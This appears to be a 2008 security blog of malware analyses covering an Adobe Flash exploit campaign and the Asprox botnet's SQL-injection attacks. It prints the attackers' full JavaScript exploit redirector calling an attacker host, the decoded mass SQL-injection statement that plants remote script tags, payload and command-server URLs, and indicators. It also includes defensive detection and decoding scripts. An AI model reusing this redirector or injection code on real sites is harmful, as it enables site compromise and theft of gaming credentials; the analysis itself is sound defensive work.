Wednesday, May 28, 2008

Adobe Flash Player Exploitation

Several sources, including Symantec DeepSight, SANS ISC, and Dancho Danchev, have reported in-the-wild exploitation of a vulnerability affecting Adobe Flash Player. The vulnerability was originally thought to be a 0-day, but analysis has revealed it is more likely the previously reported Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability (CVE-2007-0071). Adobe Flash Player 9.0.115.0 is affected, and there are conflicting reports on whether, and to what degree, the current version 9.0.124.0 is affected. Initial websites serving Flash exploit code include dota11.cn, wuqing17173.cn, woai117.cn, and play0nlnie.com. Script references to these sites (and a growing number of others) are believed to have been injected into legitimate websites through SQL injection attacks. The malicious sites use a Chinese MPack-type tool to generate numerous exploits in an effort to install PSW.OnlineGames trojans designed to exfiltrate gaming credentials. The following provides a sample analysis of wuqing17173.cn.

wuqing17173.cn Analysis:

A Google search for the identified malicious domain wuqing17173.cn (58.215.87.11) currently returns a single result that includes an injected iframe for count18[dot]wuqing17173[dot]cn/click.aspx.php.

The compromised accttstore.com site hosting the count18[dot]wuqing17173[dot]cn iframe deals in World of Warcraft (WoW) assets. The adversary's end goal is to exfiltrate online gaming credentials, so websites dedicated to WoW are prime targets for injected iframe and script redirects.

The count18[dot]wuqing17173[dot]cn/click.aspx.php connection returns what looks to be an HTTP 404 error, but the bottom of the page contains malicious JavaScript. The script checks for several ActiveX controls and, if they are present, redirects the victim to specific exploit code hosted at www[dot]0novel[dot]com (58.215.87.11). The script attempts to exploit the following vulnerabilities.

File: Flash.swf, Flash1.swf
Vulnerability: Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability
CVE: (BID 28695)

File: ms06014.js
Vulnerability: MDAC RDS.Dataspace ActiveX Control Vulnerability
CVE: CVE-2006-0003

File: Real.js
Vulnerability: RealPlayer IERPCtl ActiveX Playlist Handling Buffer Overflow Vulnerability
CVE: CVE-2007-5601

File: Lz.htm
Vulnerability: Ourgame GLWorld ActiveX Control Multiple Buffer Overflow Vulnerabilities
CVE: CVE-2008-0647

File: Bf.htm
Vulnerability: Baofeng Storm ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
CVE: CVE-2007-4816, CVE-2007-4943

File: Xl.htm
Vulnerability: Xunlei Thunder DapPlayer ActiveX Control Buffer Overflow
CVE: CVE-2007-6144

count18[dot]wuqing17173[dot]cn/click.aspx.php code:

<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="....";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/www.0novel.com\/ms06014.js><\/script>")}
else
{
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){document.write('<embed src="flash.swf"></embed>');}
if(Flashver[2] == 47){document.write('<embed src="flash1.swf"></embed>');}
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<script src=http:\/\/www.0novel.com\/real.js><\/script>')}
else
{
document.write('<iframe width=10 height=0 src=rl.htm></iframe>')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src=lz.htm></iframe>')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<iframe style=display:none src=bf.htm></iframe>')}}
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
<embed sRc=flash.swf width=50 height=0></embed>
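The redirector above relies on markup that a reader never sees: iframes sized 10x0 or styled display:none, and script tags pulling from a third-party host. The following scanner, added here as an example and not code from the original post, flags both patterns in a fetched page so that an injected site like the one described above can be spotted from a crawl. The sample HTML and the .invalid hostname are constructed for the example; the allowlist of legitimate script hosts is an assumption a site owner would fill in.

```python
"""Flag hidden iframes and external <script src=...> tags in HTML, the two
markers of the injected redirects described in the post. Added example; the
sample page below is constructed, not captured from a live site."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the 404-looking redirector page: one
# legitimate local script, one external script, two hidden iframes, and one
# ordinary visible iframe that must not be flagged.
SAMPLE_HTML = """<html><body><h1>404 Not Found</h1>
<script src="/static/site.js"></script>
<script src="http://www.example-bad.invalid/ms06014.js"></script>
<iframe width=10 height=0 src="rl.htm"></iframe>
<iframe style="display:none" src="lz.htm"></iframe>
<iframe width="600" height="400" src="https://www.example.com/player"></iframe>
</body></html>"""

# Hosts this site legitimately loads scripts from (assumption for the example).
ALLOWED_HOSTS = {"www.example.com"}


def _is_hidden(attrs):
    """True when an iframe is sized or styled so the user cannot see it."""
    width = attrs.get("width", "")
    height = attrs.get("height", "")
    style = attrs.get("style", "").replace(" ", "").lower()
    if height in ("0", "1") or width in ("0", "1"):
        return True
    return "display:none" in style or "visibility:hidden" in style


class InjectionScanner(HTMLParser):
    """Collects (kind, src) findings while the parser walks the document."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = allowed_hosts
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden-iframe", src))
        elif tag == "script" and src:
            host = urlparse(src).hostname
            # A relative src has no host and is the site's own; an external
            # host outside the allowlist is the injected-script pattern.
            if host and host not in self.allowed:
                self.findings.append(("external-script", src))


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return the list of (kind, src) findings for one HTML document."""
    parser = InjectionScanner(allowed_hosts)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_HTML):
        print(f"{kind}: {src}")
```

Run against the sample it reports the external ms06014.js script and the two hidden iframes while leaving the local script and the visible player iframe alone; on a real crawl the findings become the list of pages to clean and the hosts to block.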

The strings of Flash.swf include the payload http: //www[dot]lovedai[dot]cn/back.css (58.215.87.11) executed as c:\6123t.exe. The payload from the other exploits was www[dot]0novel[dot]com/back.css (58.215.87.11).

Flash.swf strings:

FWS
fHY<

`P3
t.x
urlmon.dll
SSR
;C:\6123t.exe
ahU
http: //www[dot]lovedai[dot]cn/back.css
t.x
C
new_fla MainTimeline
flash.display
MovieClip
new_fla:MainTimeline
frame1
addFrameScript
Object flash.events
EventDispatcher
DisplayObject
InteractiveObject
DisplayObjectContainer
Spritenew_fla.MainTimeline

Malware Analysis:

The malware back.css is a binary file designed to look like a cascading style sheet. The malware creates backow.dll in the victim's Temp directory and creates and deletes C:\w1.hiv and C:\w2.hiv. The malware backow.dll is detected as an Infostealer.Gampass variant (Symantec) designed to exfiltrate World of Warcraft (WoW) online gaming accounts.

Filename: back.css
MD5: 54939e5ffb291518a1fb0f28a92faf41
Size: 25.7 KB (26,368 bytes)

Back.css creates:

C:\Documents and Settings\username\Local Settings\Temp\backow.dll

Filename: backow.dll
MD5: 86909167e5b867ea509bd91dba6add03
Size: 14.2 KB (14,592 bytes)

The binary strings of backow.dll reveal WoW domains and the file realmlist.wtf which is a WoW text file that tells the WoW-client which server to connect to.

00003134 00403D34 0 realmlist.wtf
0000317C 00403D7C 0 .worldofwarcraft.com
0000319C 00403D9C 0 .wowchina.com

Back.css creates the following registry keys:

HKEY_CURRENT_USER\Software\ComWaraisn "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:
HKEY_CURRENT_USER\Software\ComWaraisn "{AEB6717E-7E19-11d0-97EE-00C04FD91972}"
Type: REG_SZ
Data:
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4} "(Default)"
Type: REG_SZ
Data: Windows
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\username\LOCALS~1\Temp\backow.dll
HKEY_CLASSES_ROOT\CLSID\{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{00211E3E-D7A2-456A-AE04-EB9ABF822FE4}"
Type: REG_SZ
Data:

Monday, May 19, 2008

Asprox Trojan and banner82.com

On May 19, 2008 Dancho Danchev discussed fast-fluxing SQL injections this time involving the domain banner82.com. The banner82.com SQL injection attacks are similar to the previous direct84.com injections, but there are some slight differences.

SQL Injection Attack:

DECLARE @S VARCHAR(4000);SET @S=CAST(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 AS
VARCHAR(4000));EXEC(@S);--

Decodes to:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(8000),['+@C+']))+''script src=http: //www[dot]banner82[dot]com/b.js script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Tae_Cursor

The user-agent for the injection was: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1; .NET CLR 2.0.50727)

Banner82.com Domain
As reported by Danchev, the domain uses fast-flux technology (double-flux) with a rotating pool of proxy peer and DNS IP addresses. A small sample during analysis revealed:

24.126.130.229
67.167.252.180
69.247.201.61
71.81.34.118
74.129.121.181
75.118.8.92
78.92.76.30
89.170.16.252
99.151.145.10
99.254.31.140

Banner82.com Site
The b.js file may redirect to malicious code at a variety of locations. A sample analysis revealed the following.

injected script: http: //www[dot]banner82[dot]com/b.js

b.js returned an iframe redirect to: http: //banner82[dot]com/cgi-bin/index.cgi?ad

http: //banner82[dot]com/cgi-bin/index.cgi?ad returned a location redirect to: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox

http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?inbox returned two layers of obfuscated code (callee.toString() + location.href)

The result is a script redirect to http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258007e11f339060000000002e547d1afff02656e2d75730000000000

(the string characters vary with each connection)

Two more layers of obfuscated code (callee.toString() + location.href) reveal Neosploit-generated exploit code targeting the following vulnerabilities:

MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)
AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
GOM Player GOM Manager ActiveX Control Buffer Overflow (CVE-2007-5779)
CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability (CVE-2008-1472)
Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability (CVE-2007-0059)
Heap-based buffer overflow in DirectAnimation.PathControl COM object (CVE-2006-4446)

The payload was a request for the binary file: http: //66[dot]199[dot]242[dot]26/cgi-bin/index.cgi?ad75d33b00000258027e11f339060000000002e547d1e60002040900000000020

Malware Analysis:
The payload was saved as "index".

Filename: (index.exe) – long string of characters
MD5: 60b9fbb8ba14171cd5d3d1fd86ddd564
Size: 48.0 KB (49,152 bytes)

The malware made the following connections to retrieve common.bin (spam instructions) and cmdexe.bin (the SQL injection tool msscntr32.exe).

POST /forum.php HTTP/1.1
Host: 66[dot]199[dot]241[dot]98

POST /forum_asp.php HTTP/1.1
Host: 66[dot]197[dot]168[dot]5

The "index" malware searches for installations of CuteFTP and WS_FTP. The following files were created:

C:\WINDOWS\System32\aspimgr.exe Trojan.Asprox (Symantec)
C:\WINDOWS\s32.txt
C:\WINDOWS\System32\msscntr32.exe

Filename: aspimgr.exe
MD5: bb0c22f33cbf8be8a264e96ef6895ce4
Size: 72.0 KB (73,728 bytes)

Filename: msscntr32.exe
MD5: 30afb898ba27e925f41eab9e68b62833
Size: 20.0 KB (20,480 bytes)

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {056B8C51-1B27-4D61-81CA-66EA278842B7}

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "DisplayName"
Type: REG_SZ
Data: Microsoft Security Center Extension
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\msscntr32.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_MSSCENTER\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\msscenter\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to "ns.uk2.net" on port 53 (IP)
* Connects to "www.yahoo.com" on port 80 (IP)
* Connects to "www.web.de" on port 80 (IP)

The Asprox malware generated phishing emails related to "NatWest OnLine Banking".

Thursday, May 15, 2008

Asprox Trojan and direct84.com

On 13 May 2008 SecureWorks posted an article on a SQL-injection attack tool that was being distributed within the Asprox botnet. The tool defaults to injecting a script reference to direct84[dot]com/7.js.

SQL-injection tool:

Filename: msscntr32.exe
MD5: b33be04bff3a9953a46c26dbc853af5c
Size: 17.5 KB (17,920 bytes)

The initial HTTP requests used by the msscntr32.exe attack tool will appear similar to the following:

@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630 0680061007200280032003500350029002C00400043002000760061007200630068006 10072002800320035003500290020004400450043004C00410052004500200www.example.com
The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE

The full functionality of the tool is unknown at this time but binary string analysis reveals some potential capabilities. The following relevant strings were observed.

A SQL statement that includes the default injected direct84[dot]com/7.js script.

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

The CAST hex decodes to:

char,['+@C+']))+'' script src=http ://www[dot].direct84[dot]com/7.js script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor??????????ì????? FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(var

The binary strings include a Google search that looks for “inurl%:asp inurl%:%s” with 100 results per page and the language setting set to English.

00005178 00405178 0 www.google.com
000051B0 004051B0 0 /search?hl=en&as_epq=&as_oq=&as_eq=&num=100&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images&as_q=inurl%%3Aasp+inurl%%3A%s&start=%d

The binary strings include a reference to direct84[dot]com/7.js as well as www[dot]answers.com and youtube.com. It is unknown if these domains are used to test connectivity or for decoy traffic.

00005484 00405484 0 direct84[dot]com/7.js
000054C0 004054C0 0 http://
000054DC 004054DC 0 .asp?
000054F4 004054F4 0 .google.
00005518 00405518 0 www[dot]answers[dot]com
00005554 00405554 0 youtube[dot]com
00005580 00405580 0 cache:

The following user-agent is used by the tool during SQL injection attacks

00005598 00405598 0 Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.25

Several IPs and a reference to s32.txt were visible.

00005A9C 00405A9C 0 s32.txt
00005AC0 00405AC0 0 66.199.241.98
00005ACE 00405ACE 0 82.103.140.75
00005ADC 00405ADC 0 72.21.63.114
00005AE9 00405AE9 0 66.232.102.169

00005AF8 00405AF8 0 66.96.196.53

direct84.com analysis:
The direct84.com domain currently fast-fluxes to several different IPs in the US, Israel and Poland. A short interval included the following round-robin addresses (146.6.143.67, 172.163.165.232, 212.160.151.233, 66.1.4.187, 68.45.135.137, 69.73.111.7, 71.201.175.192, 74.248.14.151, 84.109.131.90, 89.77.235.81)

The direct84.com 7.js script returned an iframe redirect to http: //67[dot]228[dot]13[dot]98/cgi-bin/index.cgi?user1. (This and following redirect paths continually change).

The 67[dot]228[dot]13[dot]98 cgi request returns an iframe redirect to http: //216[dot]32[dot]85[dot]234/index.php

The index.php returned 3 exploits:
Microsoft DirectX Media 6.0 Live Picture Corporation DirectTransform FlashPix ActiveX control buffer overflow (CVE-2007-4336)
Apple QuickTime RTSP Content-Type header stack buffer overflow (CVE-2007-6166)
MDAC RDS.Dataspace ActiveX control vulnerability (CVE-2006-0003)

The payload is http: //216[dot]32[dot]85[dot]234/load.php?MSIE downloaded as ldr.exe.

Malware Analysis:
The malware ldr.exe is detected as Trojan.Asprox (Symantec)

Filename: ldr.exe
MD5: f27dc661f7b51dd76adfb2d371b888e8
Size: 48640

The following files are created:

C:\WINDOWS\db32.txt.
C:\WINDOWS\system32\aspimgr.exe.
C:\WINDOWS\ws386.ini.
C:\WINDOWS\s32.txt.

The following file is deleted:

C:\WINDOWS\db32.txt

The following registry keys are created to install aspimgr.exe as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "DisplayName"
Type: REG_SZ
Data: Microsoft ASPI Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ImagePath"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\System32\aspimgr.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr "Type"
Type: REG_DWORD
Data: 10, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_ASPIMGR\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr\Security "Security"
Type: REG_BINARY
Data: 01, 00, 14, 80, 90, 00, 00, 00, 9C, 00, 00, 00, 14, 00, 00, 00, 30, 00, 00, 00, 02, 00, 1C, 00, 01, 00, 00, 00, 02, 80, 14, 00, FF, 01, 0F, 00, 01, 01, 00, 00, 00, 00, 00, 01, 00, 00, 00, 00, 02, 00, 60, 00, 04, 00, 00, 00, 00, 00, 14, 00, FD, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 00, 00, 18, 00, FF, 01, 0F, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 20, 02, 00, 00, 00, 00, 14, 00, 8D, 01, 02, 00, 01, 01, 00, 00, 00, 00, 00, 05, 0B, 00, 00, 00, 00, 00, 18, 00, FD, 01, 02, 00, 01, 02, 00, 00, 00, 00, 00, 05, 20, 00, 00, 00, 23, 02, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00, 01, 01, 00, 00, 00, 00, 00, 05, 12, 00, 00, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Sft "(Default)"
Type: REG_SZ
Data: {4C7783CA-076B-4313-BBF1-21FB818E7701}

The malware aspimgr.exe makes the following connections and sets up an HTTP server on port 80.

* Connects to "ns.uk2.net" on port 53 (IP).
* Connects to "www.yahoo.com" on port 80 (IP).
* Connects to "www.web.de" on port 80 (IP).
* Connects to "FAKE" on port 4660 (IP).

The malware aspimgr.exe initiates a POST connection to http: //66[dot]232[dot]102[dot]169/forum.php. The connection passes system and trojan characteristics and a binary file common.bin is returned which contains trojan spamming instructions to include IP addresses, email addresses, SMTP commands, and spam email content. Common.bin can be decoded by XORing each byte with 27 (hex 0x1B) as previously referenced at SANS.

A sample decoded common.bin file:

98.200.11.115567.161.226.835129.59.138.199568.45.135.137584.109.131.90568.249.106.122524.126.130.229598.208.97.485<5_n>70.231.150.1615209.74.208.75589.78.235.81584.10.100.196575.137.93.12586.16.211.245566.233.229.99574.60.224.365<5_m>74.50.120.15055/customerup5ate5/confirm.aspx5/in5ex.php5/55/5etails.aspx5/94.js5/servlet5/profile5/ecar5s5/7.js5/olb5/custform5524.74.176.23755akronchablis@gar5ener.com55akroncha5@earthlink.net55akroncha5@technologist.com55akroncha55@unite5layer.com55akroncha5wick@royalgar5ensupplies.com55akronchaff@rrfabrications.com55akronchagrin@hair5resser.net55akronchain@clerk.com55akronchain@5iplomats.
[truncated]
Message-ID: <%%MSGID%%>55From: %%FROM%%55To: <%%RCPT%%>55Subject: %%SUBJ%%55Date: %%DATE%%55MIME-Version: 1.055Content-Type: multipart/alternative;555boun5ary="%%BND:1%%"55X-Priority: 355X-MSMail-Priority: Normal55X-Mailer: Microsoft Outlook Express 6.00.2900.218055X-MimeOLE: Pro5uce5 By Microsoft MimeOLE V6.00.2900.21805555This is a multi-part message in MIME format.5555--%%BND:1%%55Content-Type: text/plain;555charset="iso-8859-1"55Content-Transfer-Enco5ing: quote5-printable5555 Get popular cheap Soft right now!5 Absolutely all OF OUR OEMS ARE AVAILABLE ON EVERY EUROPEAN LANGUAGES -5 English, French, Italian, Spanish, German an5 any others..55 Win5ows Vista Ultimate - $71.065 Win5ows XP Pro With SP2 - $57.555 Office Enterprise 2007 - $72.015
[truncated]
helo5555<11300000resolve55<11301010ptr55<11300010reverse55<11301010fqdn55<113000115nserror55<113000115nsinvali555<113000115nsfail55<113000115nslookup55
[truncated]
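The single-byte XOR described above (each byte XORed with 0x1B) is its own inverse, so one routine both undoes the encoding and, for testing, produces a blob shaped like common.bin. The script below, added here as an example and not part of the original post, decodes such a blob and pulls out the indicator types the post says the file carries (IP addresses, URL paths, e-mail addresses). The encoded sample is constructed in the code from RFC 5737 documentation addresses and example.com mailboxes; it is not a real common.bin.

```python
"""Decode a common.bin-style blob by XORing every byte with 0x1B, then extract
IPv4 addresses, URL paths and e-mail addresses from the result. Added example;
the encoded input is constructed here, not a captured sample."""
import re

XOR_KEY = 0x1B   # key reported for common.bin in the post above


def xor_decode(data, key=XOR_KEY):
    """Single-byte XOR is its own inverse: the same call encodes and decodes."""
    return bytes(b ^ key for b in data)


IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# A path token such as /index.php or /7.js standing on its own (not part of a URL).
PATH_RE = re.compile(r"(?<![\w/])/[\w./-]*\.(?:aspx?|php|js)\b")


def _uniq(seq):
    """Deduplicate while keeping first-seen order."""
    seen, out = set(), []
    for item in seq:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def extract_iocs(decoded):
    """Return the indicators found in a decoded blob, grouped by type."""
    text = decoded.decode("latin-1")   # byte-for-byte view; NUL separators survive
    return {
        "ips": _uniq(IPV4_RE.findall(text)),
        "paths": _uniq(PATH_RE.findall(text)),
        "emails": _uniq(EMAIL_RE.findall(text)),
    }


# Constructed plaintext in the shape of the decoded sample above (NUL-separated
# fields), then XOR-encoded so the decoder has a realistic input to undo.
PLAIN = (b"192.0.2.10\x00203.0.113.7\x00/confirm.aspx\x00/index.php\x00/7.js\x00"
         b"alice@example.com\x00bob@example.net\x00helo\x00")
SAMPLE_COMMON_BIN = xor_decode(PLAIN)


def analyse(blob=SAMPLE_COMMON_BIN, key=XOR_KEY):
    """Decode a blob and return its indicators; the entry point for a real file."""
    return extract_iocs(xor_decode(blob, key))


if __name__ == "__main__":
    for kind, items in analyse().items():
        print(kind, items)
```

For a captured file, read it in binary mode and pass the bytes to analyse(); the decoded addresses and mailboxes are what a mail-gateway or firewall blocklist would be built from.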

Spamming must pay well...

nihaorr1.com SQL Injection

